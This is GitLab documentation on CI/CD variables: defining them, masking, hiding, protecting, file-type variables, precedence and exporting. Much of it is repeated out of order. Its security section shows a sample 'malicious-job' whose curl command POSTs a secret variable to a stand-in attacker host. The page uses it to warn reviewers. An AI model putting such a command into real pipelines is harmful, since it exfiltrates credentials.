logs](#mask-a-cicd-variable). You can also [limit a variable to protected branches and tags only](#protect-a-cicd-variable). Alternatively, use one of the native GitLab integrations to connect with third party secrets manager providers to store and retrieve secrets: - [HashiCorp Vault](../secrets/_index.md) - [Azure Key Vault](../secrets/azure_key_vault.md) - [Google Secret Manager](../secrets/gcp_secret_manager.md) You can also use [OpenID Connect (OIDC) authentication](../secrets/id_token_authentication.md) for secrets managers which do not have a native integration. Malicious scripts like in `malicious-job` must be caught during the review process. Reviewers should never trigger a pipeline when they find code like this, because malicious code can compromise both masked and protected variables. Variable values are encrypted using [`aes-256-cbc`](https://en.wikipedia.org/wiki/Advanced_Encryption_Standard) and stored in the database. This data can only be read and decrypted with a valid [secrets file](../../administration/backup_restore/troubleshooting_backup_gitlab.md#when-the-secrets-file-is-lost). ### Mask a CI/CD variable {{< alert type="warning" >}} Masking a CI/CD variable is not a guaranteed way to prevent malicious users from accessing variable values. To ensure security of sensitive information, consider using [external secrets](../secrets/_index.md) and [file type variables](#use-file-type-cicd-variables) to prevent commands such as `env`/`printenv` from printing secret variables. {{< /alert >}} You can mask a project, group, or instance CI/CD variable so the value of the variable does not display in job logs. When a masked CI/CD variable would be displayed in a job log, the value is replaced with `[masked]` to prevent the value from being exposed. Prerequisites: - You must have the same role or access level as required to [add a CI/CD variable in the UI](#define-a-cicd-variable-in-the-ui). To mask a variable: 1. For the group, project, or in the **Admin** area, select **Settings > CI/CD**. 1. Expand **Variables**. 1. Next to the variable you want to protect, select **Edit**. 1. Under **Visibility**, select **Mask variable**. 1. Select **Update variable**. The method used to mask variables [limits what can be included in a masked variable](https://gitlab.com/gitlab-org/gitlab-foss/-/issues/13784#note_106756757). The value of the variable must: - Be a single line with no spaces. - Be 8 characters or longer. - Not match the name of an existing predefined or custom CI/CD variable. - Not include non-alphanumeric characters other than `@`, `_`, `-`, `:`, or `+`. Additionally, if [variable expansion](#prevent-cicd-variable-expansion) is enabled, the value can contain only: - Characters from the Base64 alphabet (RFC4648). - The `@`, `:`, `.`, or `~` characters. Masking a variable automatically masks the value anywhere in a job log. If another variable has the same value, that value is also masked, including when a variable references a masked variable. The string `[MASKED]` is shown instead of the value, possibly with some trailing `x` characters. Secrets could be revealed when `CI_DEBUG_SERVICES` is enabled. For details, read about [service container logging](../services/_index.md#capturing-service-container-logs). ### Hide a CI/CD variable {{< history >}} - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/29674) in GitLab 17.4 [with a flag](../../administration/feature_flags/_index.md) named `ci_hidden_variables`. Enabled by default. - [Generally available](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/165843) in GitLab 17.6. Feature flag `ci_hidden_variables` removed. {{< /history >}} In addition to masking, you can also prevent the value of CI/CD variables from being revealed in the **CI/CD** settings page. Hiding a variable is only possible when creating a new variable, you cannot update an existing variable to be hidden. Prerequisites: - You must have the same role or access level as required to [add a CI/CD variable in the UI](#define-a-cicd-variable-in-the-ui). - The variable value must match the [requirements for masked variables](#mask-a-cicd-variable). To hide a variable, select **Masked and hidden** in the **Visibility** section when you [add a new CI/CD variable in the UI](#define-a-cicd-variable-in-the-ui). After you save the variable, the variable can be used in CI/CD pipelines, but cannot be revealed in the UI again. ### Protect a CI/CD variable You can configure a project, group, or instance CI/CD variable to be available only to pipelines that run on [protected branches](../../user/project/repository/branches/protected.md) or [protected tags](../../user/project/protected_tags.md). [Merged results pipelines](../pipelines/merged_results_pipelines.md) and [merge request pipelines](../pipelines/merge_request_pipelines.md) can optionally [access protected variables](../pipelines/merge_request_pipelines.md#control-access-to-protected-variables-and-runners). Prerequisites: - You must have the same role or access level as required to [add a CI/CD variable in the UI](#define-a-cicd-variable-in-the-ui). To set a variable as protected: 1. For the project or group, go to **Settings > CI/CD**. 1. Expand **Variables**. 1. Next to the variable you want to protect, select **Edit**. 1. Select the **Protect variable** checkbox. 1. Select **Update variable**. The variable is available for all subsequent pipelines. ### Use file type CI/CD variables All predefined CI/CD variables and variables defined in the `.gitlab-ci.yml` file are "variable" type ([`variable_type` of `env_var` in the API](#define-a-cicd-variable-in-the-ui)). Variable type variables: - Consist of a key and value pair. - Are made available in jobs as environment variables, with: - The CI/CD variable key as the environment variable name. - The CI/CD variable value as the environment variable value. Project, group, and instance CI/CD variables are "variable" type by default, but can optionally be set as a "file" type ([`variable_type` of `file` in the API](#define-a-cicd-variable-in-the-ui)). File type variables: - Consist of a key, value, and file. - Are made available in jobs as environment variables, with: - The CI/CD variable key as the environment variable name. - The CI/CD variable value saved to a temporary file. - The path to the temporary file as the environment variable value. Use file type CI/CD variables for tools that need a file as input. [The AWS CLI](https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-envvars.html) and [`kubectl`](https://kubernetes.io/docs/concepts/configuration/organize-cluster-access-kubeconfig/#the-kubeconfig-environment-variable) are both tools that use `File` type variables for configuration. For example, if you are using `kubectl` with: - A variable with a key of `KUBE_URL` and `https://example.com` as the value. - A file type variable with a key of `KUBE_CA_PEM` and a certificate as the value. Pass `KUBE_URL` as a `--server` option, which accepts a variable, and pass `$KUBE_CA_PEM` as a `--certificate-authority` option, which accepts a path to a file: ```shell kubectl config set-cluster e2e --server="$KUBE_URL" --certificate-authority="$KUBE_CA_PEM" ``` #### Use a `.gitlab-ci.yml` variable as a file type variable You cannot set a CI/CD variable [defined in the `.gitlab-ci.yml` file](#define-a-cicd-variable-in-the-gitlab-ciyml-file) as a file type variable. If you have a tool that requires a file path as an input, but you want to use a variable defined in the `.gitlab-ci.yml`: - Run a command that saves the value of the variable in a file. - Use that file with your tool. For example: ```yaml variables: SITE_URL: "https://gitlab.example.com" job: script: - echo "$SITE_URL" > "site-url.txt" - mytool --url-file="site-url.txt" ``` ## Prevent CI/CD variable expansion Expanded variables treat values with the `$` character as a reference to another variable. CI/CD variables are expanded by default. To treat variables with a `$` character as raw strings, disable variable expansion for the variable Prerequisites: - You must have the same role or access level as required to [add a CI/CD variable in the UI](#define-a-cicd-variable-in-the-ui). To disable variable expansion for the variable: 1. For the project or group, go to **Settings > CI/CD**. 1. Expand **Variables**. 1. Next to the variable you want to do not want expanded, select **Edit**. 1. Clear the **Expand variable** checkbox. 1. Select **Update variable**. ## CI/CD variable precedence {{< history >}} - Scan Execution Policies variable precedence was [changed](https://gitlab.com/gitlab-org/gitlab/-/issues/424028) in GitLab 16.7 [with a flag](../../administration/feature_flags/_index.md) named `security_policies_variables_precedence`. Enabled by default. [Feature flag removed in GitLab 16.8](https://gitlab.com/gitlab-org/gitlab/-/issues/435727). {{< /history >}} You can use CI/CD variables with the same name in different places, but the values can overwrite each other. The type of variable and where they are defined determines which variables take precedence. The order of precedence for variables is (from highest to lowest): 1. [Pipeline execution policy variables](../../user/application_security/policies/pipeline_execution_policies.md#cicd-variables). 1. [Scan execution policy variables](../../user/application_security/policies/scan_execution_policies.md). 1. [Pipeline variables](#use-pipeline-variables). These variables all have the same precedence: - [Variables passed to downstream pipelines](../pipelines/downstream_pipelines.md#pass-cicd-variables-to-a-downstream-pipeline). - [Trigger variables](../triggers/_index.md#pass-cicd-variables-in-the-api-call). - [Scheduled pipeline variables](../pipelines/schedules.md#add-a-pipeline-schedule). - [Manual pipeline run variables](../pipelines/_index.md#run-a-pipeline-manually). - Variables added when [creating a pipeline with the API](../../api/pipelines.md#create-a-new-pipeline). - [Manual job variables](../jobs/job_control.md#specify-variables-when-running-manual-jobs). 1. Project [variables](#for-a-project). 1. Group [variables](#for-a-group). If the same variable name exists in a group and its subgroups, the job uses the value from the closest subgroup. For example, if you have `Group > Subgroup 1 > Subgroup 2 > Project`, the variable defined in `Subgroup 2` takes precedence. 1. Instance [variables](#for-an-instance). 1. [Variables from `dotenv` reports](job_scripts.md#pass-an-environment-variable-to-another-job). 1. Job variables, defined in jobs in the `.gitlab-ci.yml` file. 1. Default variables for all jobs, defined at the top-level of the `.gitlab-ci.yml` file. 1. [Deployment variables](predefined_variables.md#deployment-variables). 1. [Predefined variables](predefined_variables.md). For example: ```yaml variables: API_TOKEN: "default" job1: variables: API_TOKEN: "secure" script: - echo "The variable is '$API_TOKEN'" ``` In this example, `job1` outputs `The variable is 'secure'` because variables defined in jobs in the `.gitlab-ci.yml` file have higher precedence than default variables. ## Use pipeline variables Pipeline variables are variables that are specified when running a new pipeline. Prerequisites: - You must have the Developer role in the project. You can specify a pipeline variable when you: - [Run a pipeline manually](../pipelines/_index.md#run-a-pipeline-manually) in the UI. - Create a pipeline by using [the `pipelines` API endpoint](../../api/pipelines.md#create-a-new-pipeline). - Create a pipeline by using [the `triggers` API endpoint](../triggers/_index.md#pass-cicd-variables-in-the-api-call). - Use [push options](../../topics/git/commit.md#push-options-for-gitlab-cicd). - Pass variables to a downstream pipeline by using either the [`variables` keyword](../pipelines/downstream_pipelines.md#pass-cicd-variables-to-a-downstream-pipeline), [`trigger:forward` keyword](../yaml/_index.md#triggerforward) or [`dotenv` variables](../pipelines/downstream_pipelines.md#pass-dotenv-variables-created-in-a-job). These variables have [higher precedence](#cicd-variable-precedence) and can override other defined variables, including [predefined variables](predefined_variables.md). {{< alert type="warning" >}} You should avoid overriding predefined variables in most cases, as it can cause the pipeline to behave unexpectedly. {{< /alert >}} {{< alert type="note" >}} In [GitLab 17.7](../../update/deprecations.md#increased-default-security-for-use-of-pipeline-variables) and later, [pipeline inputs](../inputs/_index.md#for-a-pipeline) are recommended over passing pipeline variables. For enhanced security, you should [disable pipeline variables](#restrict-pipeline-variables) when using inputs. {{< /alert >}} ### Restrict pipeline variables {{< history >}} - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/440338) in GitLab 17.1. - For GitLab.com, setting defaults [updated for all new projects in new namespaces](https://gitlab.com/gitlab-org/gitlab/-/issues/502382) to `no_one_allowed` for `ci_pipeline_variables_minimum_override_role` in GitLab 17.7. {{< /history >}} You can limit who can [run pipelines with pipeline variables](#use-pipeline-variables) to specific user roles. When users with a lower role try to use pipeline variables, they receive an `Insufficient permissions to set pipeline variables` error message. Prerequisites: - You must have the Maintainer role in the project. If the minimum role was previously set to `owner` or `no_one_allowed`, then you must have the Owner role in the project. To limit the use of pipeline variables to only the Maintainer role and higher: - Go to **Settings > CI/CD > Variables**. - Under **Minimum role to use pipeline variables**, select one of: - `no_one_allowed`: No pipelines can run with pipeline variables. Default for new projects in new namespaces on GitLab.com. - `owner`: Only users with the Owner role can run pipelines with pipeline variables. You must have the Owner role for the project to change the setting to this value. - `maintainer`: Only users with at least the Maintainer role can run pipelines with pipeline variables. Default when not specified on GitLab Self-Managed and GitLab Dedicated. - `developer`: Only users with at least the Developer role can run pipelines with pipeline variables. You can also use [the projects API](../../api/projects.md#edit-a-project) to set the role for the `ci_pipeline_variables_minimum_override_role` setting. This restriction does not affect the use of CI/CD variables from the project or group settings. Most jobs can still use the `variables` keyword in the YAML configuration, but not jobs that use the `trigger` keyword to trigger downstream pipelines. Trigger jobs pass variables to a downstream pipelines as pipeline variables, which is also controlled by this setting. ## Exporting variables Scripts executed in separate shell contexts do not share exports, aliases, local function definitions, or any other local shell updates. This means that if a job fails, variables created by user-defined scripts are not exported. When runners execute jobs defined in `.gitlab-ci.yml`: - Scripts specified in `before_script` and the main script are executed together in a single shell context, and are concatenated. - Scripts specified in `after_script` run in a shell context completely separate to the `before_script` and the specified scripts. Regardless of the shell the scripts are executed in, the runner output includes: - Predefined variables. - Variables defined in: - Instance, group, or project CI/CD settings. - The `.gitlab-ci.yml` file in the `variables:` section. - The `.gitlab-ci.yml` file in the `secrets:` section. - The `config.toml`. The runner cannot handle manual exports, shell aliases, and functions executed in the body of the script, like `export MY_VARIABLE=1`. For example, in the following `.gitlab-ci.yml` file, the following scripts are defined: ```yaml job: variables: JOB_DEFINED_VARIABLE: "job variable" before_script: - echo "This is the 'before_script' script" - export MY_VARIABLE="variable" script: - echo "This is the 'script' script" - echo "JOB_DEFINED_VARIABLE's value is ${JOB_DEFINED_VARIABLE}" - echo "CI_COMMIT_SHA's value is ${CI_COMMIT_SHA}" - echo "MY_VARIABLE's value is ${MY_VARIABLE}" after_script: - echo "JOB_DEFINED_VARIABLE's value is ${JOB_DEFINED_VARIABLE}" - echo "CI_COMMIT_SHA's value is ${CI_COMMIT_SHA}" - echo "MY_VARIABLE's value is ${MY_VARIABLE}" ``` When the runner executes the job: 1. `before_script` is executed: 1. Prints to the output. 1. Defines the variable for `MY_VARIABLE`. 1. `script` is executed: 1. Prints to the output. 1. Prints the value of `JOB_DEFINED_VARIABLE`. 1. Prints the value of `CI_COMMIT_SHA`. 1. Prints the value of `MY_VARIABLE`. 1. `after_script` is executed in a new, separate shell context: 1. Prints to the output. 1. Prints the value of `JOB_DEFINED_VARIABLE`. 1. Prints the value of `CI_COMMIT_SHA`. 1. Prints an empty value of `MY_VARIABLE`. The variable value cannot be detected because `after_script` is in a separate shell context to `before_script`. ## Related topics - You can configure [Auto DevOps](../../topics/autodevops/_index.md) to pass CI/CD variables to a running application. To make a CI/CD variable available as an environment variable in the running application's container, [prefix the variable key](../../topics/autodevops/cicd_variables.md#configure-application-secret-variables) with `K8S_SECRET_`. - The [Managing the Complex Configuration Data Management Monster Using GitLab](https://www.youtube.com/watch?v=v4ZOJ96hAck) video is a walkthrough of the [Complex Configuration Data Monorepo](https://gitlab.com/guided-explorations/config-data-top-scope/config-data-subscope/config-data-monorepo) working example project. It explains how multiple levels of group CI/CD variables can be combined with environment-scoped project variables for complex configuration of application builds or deployments. The example can be copied to your own group or instance for testing. More details on what other GitLab CI patterns are demonstrated are available at the project page. - You can [pass CI/CD variables to downstream pipelines](../pipelines/downstream_pipelines.md#pass-cicd-variables-to-a-downstream-pipeline). Use [`trigger:forward` keyword](../yaml/_index.md#triggerforward) to specify what type of variables to pass to the downstream pipeline.
--- stage: Verify group: Pipeline Authoring info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: GitLab CI/CD variables description: Configuration, usage, and security. breadcrumbs: - doc - ci - variables --- {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} CI/CD variables are a type of environment variable. You can use them to: - Control the behavior of jobs and [pipelines](../pipelines/_index.md). - Store values you want to re-use, for example in [job scripts](job_scripts.md). - Avoid hard-coding values in your `.gitlab-ci.yml` file. You can [override variable values](#cicd-variable-precedence) for a specific pipeline when you [run a pipeline manually](../pipelines/_index.md#run-a-pipeline-manually), [run a manual job](../jobs/job_control.md#specify-variables-when-running-manual-jobs), or have them [prefilled in manual pipelines](../pipelines/_index.md#prefill-variables-in-manual-pipelines). Variable names are limited by the [shell the runner uses](https://docs.gitlab.com/runner/shells/) to execute scripts. Each shell has its own set of reserved variable names. To ensure consistent behavior, you should always put variable values in single or double quotes. Variables are internally parsed by the [Psych YAML parser](https://docs.ruby-lang.org/en/master/Psych.html), so quoted and unquoted variables might be parsed differently. For example, `VAR1: 012345` is interpreted as an octal value, so the value becomes `5349`, but `VAR1: "012345"` is parsed as a string with a value of `012345`. For more information about advanced use of GitLab CI/CD, see [7 advanced GitLab CI workflow hacks](https://about.gitlab.com/webcast/7cicd-hacks/) shared by GitLab engineers. ## Predefined CI/CD variables GitLab CI/CD makes a set of [predefined CI/CD variables](predefined_variables.md) available for use in pipeline configuration and job scripts. These variables contain information about the job, pipeline, and other values you might need when the pipeline is triggered or running. You can use predefined CI/CD variables in your `.gitlab-ci.yml` without declaring them first. For example: ```yaml job1: stage: test script: - echo "The job's stage is '$CI_JOB_STAGE'" ``` The script in this example outputs `The job's stage is 'test'`. ## Define a CI/CD variable in the `.gitlab-ci.yml` file To create a CI/CD variable in the `.gitlab-ci.yml` file, define the variable and value with the [`variables`](../yaml/_index.md#variables) keyword. Variables saved in the `.gitlab-ci.yml` file are visible to all users with access to the repository, and should store only non-sensitive project configuration. For example, the URL of a database saved in a `DATABASE_URL` variable. Sensitive variables containing values like secrets or keys should be [added in the UI](#define-a-cicd-variable-in-the-ui). You can define `variables` in: - A job: The variable is only available in that job's `script`, `before_script`, or `after_script` sections, and with some [job keywords](../yaml/_index.md#job-keywords). - The top-level of the `.gitlab-ci.yml` file: The variable is available as a default for all jobs in a pipeline, unless a job defines a variable with the same name. The job's variable takes precedence. In both cases, you cannot use these variables with [global keywords](../yaml/_index.md#global-keywords). For example: ```yaml variables: ALL_JOBS_VAR: "A default variable" job1: variables: JOB1_VAR: "Job 1 variable" script: - echo "Variables are '$ALL_JOBS_VAR' and '$JOB1_VAR'" job2: variables: ALL_JOBS_VAR: "Different value than default" JOB2_VAR: "Job 2 variable" script: - echo "Variables are '$ALL_JOBS_VAR', '$JOB2_VAR', and '$JOB1_VAR'" ``` In this example: - `job1` outputs: `Variables are 'A default variable' and 'Job 1 variable'` - `job2` outputs: `Variables are 'Different value than default', 'Job 2 variable', and ''` Use the [`value` and `description`](../yaml/_index.md#variablesdescription) keywords to define [variables that are prefilled](../pipelines/_index.md#prefill-variables-in-manual-pipelines) for [manually-triggered pipelines](../pipelines/_index.md#run-a-pipeline-manually). ### Skip default variables in a single job If you don't want default variables to be available in a job, set `variables` to `{}`: ```yaml variables: DEFAULT_VAR: "A default variable" job1: variables: {} script: - echo This job does not need any variables ``` ## Define a CI/CD variable in the UI Sensitive variables like tokens or passwords should be stored in the settings in the UI, not [in the `.gitlab-ci.yml` file](#define-a-cicd-variable-in-the-gitlab-ciyml-file). Add CI/CD variables in the UI: - For a project [in the project's settings](#for-a-project). - For all projects in a group [in the group's setting](#for-a-group). - For all projects in a GitLab instance [in the instance's settings](#for-an-instance). Alternatively, these variables can be added by using the API: - [With the project-level variables API endpoint](../../api/project_level_variables.md). - [With the group-level variables API endpoint](../../api/group_level_variables.md). - [With the instance-level variables API endpoint](../../api/instance_level_ci_variables.md). By default, pipelines from forked projects can't access the CI/CD variables available to the parent project. If you [run a merge request pipeline in the parent project for a merge request from a fork](../pipelines/merge_request_pipelines.md#run-pipelines-in-the-parent-project), all variables become available to the pipeline. ### For a project You can add CI/CD variables to a project's settings. Projects can have a maximum of 8000 CI/CD variables. Prerequisites: - You must be a project member with the Maintainer role. To add or update variables in the project settings: 1. On the left sidebar, select **Search or go to** and find your project. 1. Select **Settings > CI/CD**. 1. Expand **Variables**. 1. Select **Add variable** and fill in the details: - **Key**: Must be one line, with no spaces, using only letters, numbers, or `_`. - **Value**: No limitations. - **Type**: `Variable` (default) or [`File`](#use-file-type-cicd-variables). - **Environment scope**: Optional. **All (default)** (`*`), a specific [environment](../environments/_index.md#types-of-environments), or a wildcard [environment scope](../environments/_index.md#limit-the-environment-scope-of-a-cicd-variable). - **Protect variable** Optional. If selected, the variable is only available in pipelines that run on [protected branches](../../user/project/repository/branches/protected.md) or [protected tags](../../user/project/protected_tags.md). - **Visibility**: Select **Visible** (default), [**Masked**](#mask-a-cicd-variable), or [**Masked and hidden**](#hide-a-cicd-variable) (only available for new variables). After you create a variable, you can use it in the pipeline configuration or in [job scripts](job_scripts.md). ### For a group You can make a CI/CD variable available to all projects in a group. Groups can have a maximum of 30000 CI/CD variables. Prerequisites: - You must be a group member with the Owner role. To add a group variable: 1. On the left sidebar, select **Search or go to** and find your group. 1. Select **Settings > CI/CD**. 1. Expand **Variables**. 1. Select **Add variable** and fill in the details: - **Key**: Must be one line, with no spaces, using only letters, numbers, or `_`. - **Value**: No limitations. - **Type**: `Variable` (default) or [`File`](#use-file-type-cicd-variables). - **Protect variable** Optional. If selected, the variable is only available in pipelines that run on [protected branches](../../user/project/repository/branches/protected.md) or [protected tags](../../user/project/protected_tags.md). - **Visibility**: Select **Visible** (default), [**Masked**](#mask-a-cicd-variable), or [**Masked and hidden**](#hide-a-cicd-variable) (only available for new variables). The group variables that are available in a project are listed in the project's **Settings > CI/CD > Variables** section. Variables from [subgroups](../../user/group/subgroups/_index.md) are recursively inherited. #### Environment scope {{< details >}} - Tier: Premium, Ultimate {{< /details >}} To set a group CI/CD variable to only be available for certain environments: 1. On the left sidebar, select **Search or go to** and find your group. 1. Select **Settings > CI/CD**. 1. Expand **Variables**. 1. To the right of the variable, select **Edit** ({{< icon name="pencil" >}}). 1. For **Environment scope**, select **All (default)** (`*`), a specific [environment](../environments/_index.md#types-of-environments), or a wildcard [environment scope](../environments/_index.md#limit-the-environment-scope-of-a-cicd-variable). ### For an instance {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab Self-Managed, GitLab Dedicated {{< /details >}} You can make a CI/CD variable available to all projects and groups in a GitLab instance. Prerequisites: - You must have administrator access to the instance. To add an instance variable: 1. On the left sidebar, at the bottom, select **Admin**. 1. Select **Settings > CI/CD**. 1. Expand **Variables**. 1. Select **Add variable** and fill in the details: - **Key**: Must be one line, with no spaces, using only letters, numbers, or `_`. - **Value**: The value is limited to 10,000 characters, but also bounded by any limits in the runner's operating system. - **Type**: `Variable` (default) or [`File`](#use-file-type-cicd-variables). - **Protect variable** Optional. If selected, the variable is only available in pipelines that run on [protected branches](../../user/project/repository/branches/protected.md) or [protected tags](../../user/project/protected_tags.md). - **Visibility**: Select **Visible** (default), [**Masked**](#mask-a-cicd-variable), or [**Masked and hidden**](#hide-a-cicd-variable) (only available for new variables). ## CI/CD variable security Code pushed to the `.gitlab-ci.yml` file could compromise your variables. Variables could be accidentally exposed in a job log, or maliciously sent to a third party server. Review all merge requests that introduce changes to the `.gitlab-ci.yml` file before you: - [Run a pipeline in the parent project for a merge request submitted from a forked project](../pipelines/merge_request_pipelines.md#run-pipelines-in-the-parent-project). - Merge the changes. Review the `.gitlab-ci.yml` file of imported projects before you add files or run pipelines against them. The following example shows malicious code in a `.gitlab-ci.yml` file: ```yaml accidental-leak-job: script: # Password exposed accidentally - echo "This script logs into the DB with $USER $PASSWORD" - db-login $USER $PASSWORD malicious-job: script: # Secret exposed maliciously - curl --request POST --data "secret_variable=$SECRET_VARIABLE" "https://maliciouswebsite.abcd/" ``` To help reduce the risk of accidentally leaking secrets through scripts like in `accidental-leak-job`, all variables containing sensitive information should always be [masked in job logs](#mask-a-cicd-variable). You can also [limit a variable to protected branches and tags only](#protect-a-cicd-variable). Alternatively, use one of the native GitLab integrations to connect with third party secrets manager providers to store and retrieve secrets: - [HashiCorp Vault](../secrets/_index.md) - [Azure Key Vault](../secrets/azure_key_vault.md) - [Google Secret Manager](../secrets/gcp_secret_manager.md) You can also use [OpenID Connect (OIDC) authentication](../secrets/id_token_authentication.md) for secrets managers which do not have a native integration. Malicious scripts like in `malicious-job` must be caught during the review process. Reviewers should never trigger a pipeline when they find code like this, because malicious code can compromise both masked and protected variables. Variable values are encrypted using [`aes-256-cbc`](https://en.wikipedia.org/wiki/Advanced_Encryption_Standard) and stored in the database. This data can only be read and decrypted with a valid [secrets file](../../administration/backup_restore/troubleshooting_backup_gitlab.md#when-the-secrets-file-is-lost). ### Mask a CI/CD variable {{< alert type="warning" >}} Masking a CI/CD variable is not a guaranteed way to prevent malicious users from accessing variable values. To ensure security of sensitive information, consider using [external secrets](../secrets/_index.md) and [file type variables](#use-file-type-cicd-variables) to prevent commands such as `env`/`printenv` from printing secret variables. {{< /alert >}} You can mask a project, group, or instance CI/CD variable so the value of the variable does not display in job logs. When a masked CI/CD variable would be displayed in a job log, the value is replaced with `[masked]` to prevent the value from being exposed. Prerequisites: - You must have the same role or access level as required to [add a CI/CD variable in the UI](#define-a-cicd-variable-in-the-ui). To mask a variable: 1. For the group, project, or in the **Admin** area, select **Settings > CI/CD**. 1. Expand **Variables**. 1. Next to the variable you want to protect, select **Edit**. 1. Under **Visibility**, select **Mask variable**. 1. Select **Update variable**. The method used to mask variables [limits what can be included in a masked variable](https://gitlab.com/gitlab-org/gitlab-foss/-/issues/13784#note_106756757). The value of the variable must: - Be a single line with no spaces. - Be 8 characters or longer. - Not match the name of an existing predefined or custom CI/CD variable. - Not include non-alphanumeric characters other than `@`, `_`, `-`, `:`, or `+`. Additionally, if [variable expansion](#prevent-cicd-variable-expansion) is enabled, the value can contain only: - Characters from the Base64 alphabet (RFC4648). - The `@`, `:`, `.`, or `~` characters. Masking a variable automatically masks the value anywhere in a job log. If another variable has the same value, that value is also masked, including when a variable references a masked variable. The string `[MASKED]` is shown instead of the value, possibly with some trailing `x` characters. Secrets could be revealed when `CI_DEBUG_SERVICES` is enabled. For details, read about [service container logging](../services/_index.md#capturing-service-container-logs). ### Hide a CI/CD variable {{< history >}} - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/29674) in GitLab 17.4 [with a flag](../../administration/feature_flags/_index.md) named `ci_hidden_variables`. Enabled by default. - [Generally available](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/165843) in GitLab 17.6. Feature flag `ci_hidden_variables` removed. {{< /history >}} In addition to masking, you can also prevent the value of CI/CD variables from being revealed in the **CI/CD** settings page. Hiding a variable is only possible when creating a new variable, you cannot update an existing variable to be hidden. Prerequisites: - You must have the same role or access level as required to [add a CI/CD variable in the UI](#define-a-cicd-variable-in-the-ui). - The variable value must match the [requirements for masked variables](#mask-a-cicd-variable). To hide a variable, select **Masked and hidden** in the **Visibility** section when you [add a new CI/CD variable in the UI](#define-a-cicd-variable-in-the-ui). After you save the variable, the variable can be used in CI/CD pipelines, but cannot be revealed in the UI again. ### Protect a CI/CD variable You can configure a project, group, or instance CI/CD variable to be available only to pipelines that run on [protected branches](../../user/project/repository/branches/protected.md) or [protected tags](../../user/project/protected_tags.md). [Merged results pipelines](../pipelines/merged_results_pipelines.md) and [merge request pipelines](../pipelines/merge_request_pipelines.md) can optionally [access protected variables](../pipelines/merge_request_pipelines.md#control-access-to-protected-variables-and-runners). Prerequisites: - You must have the same role or access level as required to [add a CI/CD variable in the UI](#define-a-cicd-variable-in-the-ui). To set a variable as protected: 1. For the project or group, go to **Settings > CI/CD**. 1. Expand **Variables**. 1. Next to the variable you want to protect, select **Edit**. 1. Select the **Protect variable** checkbox. 1. Select **Update variable**. The variable is available for all subsequent pipelines. ### Use file type CI/CD variables All predefined CI/CD variables and variables defined in the `.gitlab-ci.yml` file are "variable" type ([`variable_type` of `env_var` in the API](#define-a-cicd-variable-in-the-ui)). Variable type variables: - Consist of a key and value pair. - Are made available in jobs as environment variables, with: - The CI/CD variable key as the environment variable name. - The CI/CD variable value as the environment variable value. Project, group, and instance CI/CD variables are "variable" type by default, but can optionally be set as a "file" type ([`variable_type` of `file` in the API](#define-a-cicd-variable-in-the-ui)). File type variables: - Consist of a key, value, and file. - Are made available in jobs as environment variables, with: - The CI/CD variable key as the environment variable name. - The CI/CD variable value saved to a temporary file. - The path to the temporary file as the environment variable value. Use file type CI/CD variables for tools that need a file as input. [The AWS CLI](https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-envvars.html) and [`kubectl`](https://kubernetes.io/docs/concepts/configuration/organize-cluster-access-kubeconfig/#the-kubeconfig-environment-variable) are both tools that use `File` type variables for configuration. For example, if you are using `kubectl` with: - A variable with a key of `KUBE_URL` and `https://example.com` as the value. - A file type variable with a key of `KUBE_CA_PEM` and a certificate as the value. Pass `KUBE_URL` as a `--server` option, which accepts a variable, and pass `$KUBE_CA_PEM` as a `--certificate-authority` option, which accepts a path to a file: ```shell kubectl config set-cluster e2e --server="$KUBE_URL" --certificate-authority="$KUBE_CA_PEM" ``` #### Use a `.gitlab-ci.yml` variable as a file type variable You cannot set a CI/CD variable [defined in the `.gitlab-ci.yml` file](#define-a-cicd-variable-in-the-gitlab-ciyml-file) as a file type variable. If you have a tool that requires a file path as an input, but you want to use a variable defined in the `.gitlab-ci.yml`: - Run a command that saves the value of the variable in a file. - Use that file with your tool. For example: ```yaml variables: SITE_URL: "https://gitlab.example.com" job: script: - echo "$SITE_URL" > "site-url.txt" - mytool --url-file="site-url.txt" ``` ## Prevent CI/CD variable expansion Expanded variables treat values with the `$` character as a reference to another variable. CI/CD variables are expanded by default. To treat variables with a `$` character as raw strings, disable variable expansion for the variable Prerequisites: - You must have the same role or access level as required to [add a CI/CD variable in the UI](#define-a-cicd-variable-in-the-ui). To disable variable expansion for the variable: 1. For the project or group, go to **Settings > CI/CD**. 1. Expand **Variables**. 1. Next to the variable you want to do not want expanded, select **Edit**. 1. Clear the **Expand variable** checkbox. 1. Select **Update variable**. ## CI/CD variable precedence {{< history >}} - Scan Execution Policies variable precedence was [changed](https://gitlab.com/gitlab-org/gitlab/-/issues/424028) in GitLab 16.7 [with a flag](../../administration/feature_flags/_index.md) named `security_policies_variables_precedence`. Enabled by default. [Feature flag removed in GitLab 16.8](https://gitlab.com/gitlab-org/gitlab/-/issues/435727). {{< /history >}} You can use CI/CD variables with the same name in different places, but the values can overwrite each other. The type of variable and where they are defined determines which variables take precedence. The order of precedence for variables is (from highest to lowest): 1. [Pipeline execution policy variables](../../user/application_security/policies/pipeline_execution_policies.md#cicd-variables). 1. [Scan execution policy variables](../../user/application_security/policies/scan_execution_policies.md). 1. [Pipeline variables](#use-pipeline-variables). These variables all have the same precedence: - [Variables passed to downstream pipelines](../pipelines/downstream_pipelines.md#pass-cicd-variables-to-a-downstream-pipeline). - [Trigger variables](../triggers/_index.md#pass-cicd-variables-in-the-api-call). - [Scheduled pipeline variables](../pipelines/schedules.md#add-a-pipeline-schedule). - [Manual pipeline run variables](../pipelines/_index.md#run-a-pipeline-manually). - Variables added when [creating a pipeline with the API](../../api/pipelines.md#create-a-new-pipeline). - [Manual job variables](../jobs/job_control.md#specify-variables-when-running-manual-jobs). 1. Project [variables](#for-a-project). 1. Group [variables](#for-a-group). If the same variable name exists in a group and its subgroups, the job uses the value from the closest subgroup. For example, if you have `Group > Subgroup 1 > Subgroup 2 > Project`, the variable defined in `Subgroup 2` takes precedence. 1. Instance [variables](#for-an-instance). 1. [Variables from `dotenv` 